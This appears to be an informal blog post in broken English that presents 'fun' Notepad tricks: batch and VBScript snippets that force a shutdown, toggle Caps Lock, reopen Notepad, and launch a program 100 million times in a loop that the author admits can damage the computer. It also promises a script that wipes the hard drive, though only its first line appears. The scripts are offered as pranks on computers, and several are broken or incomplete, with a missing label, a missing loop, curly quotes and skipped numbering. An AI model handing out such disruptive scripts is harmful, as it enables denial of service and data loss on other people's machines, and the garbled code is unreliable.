long time no post
did you know about notepad?
what is notepad?
All Windows users know about Notepad. That is a simple text editor that has been around since Windows 1.0 in 1985. but now I do not discuss about notepad, I will discuss how for fun with notepad
you should know THIS IS NOT A VIRUS
ok, to practice and you need have a notepad and ready with all the risks
Create the notepad open automatically
Now I will explain how to create the notepad open automatically, please type the script code into notepad :
@ECHO off
START %SystemRoot%\system32\notepad.exe
GOTO top
Keep in notepad with any name with exstensi. Bat, example "eror.bat" without the quotes and change the Save As Type to All Files. This trick will make the notepad open automatically.
2. Create Caps
Lock key be error like pressed continuously
type the script code into notepad :
Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
Keep in notepad with any name with extension. vbs example: "eror.vbs" without the quotes and Save As Type change to Al Files. This trick makes the Caps
Lock key error and pressing into by his own.
3. Please type the script code into notepad
shutdown -s -t 3 -f
Keep in notepad with any name with exstensi. Bat, example "eror.bat" without the quotes and change the Save As Type to All Files. This trick like a time bomb, will shut down the computer using the time (t3 = 3 seconds)
4. This trick is dangerous, because the computer will be met by 100000000
tourstart that will meet the monitor screen and will make the computer be damaged. to overcome them can delete all the tourstart or directly restart the computer. Please type the script code into notepad :
option explicit
dim wshshell
set wshshell=wscript.createobject(“wscript.shell”)
dim x
for x = 1 to 100000000
wshshell.run “tourstart.exe”
Keep in notepad with any name with extension. vbs example: "eror.vbs" without the quotes and Save As Type change to All Files. when the file is opened will make tourstart
10. The last,
I think the most dangerous, because it can erase all data on the hard drive without exception, so inevitably it should reinstall, just type the script code in notepad:
@echo off
Keep in notepad with any name with exstensi. Bat, example "eror.bat" without the quotes and change the Save As Type to All Files.
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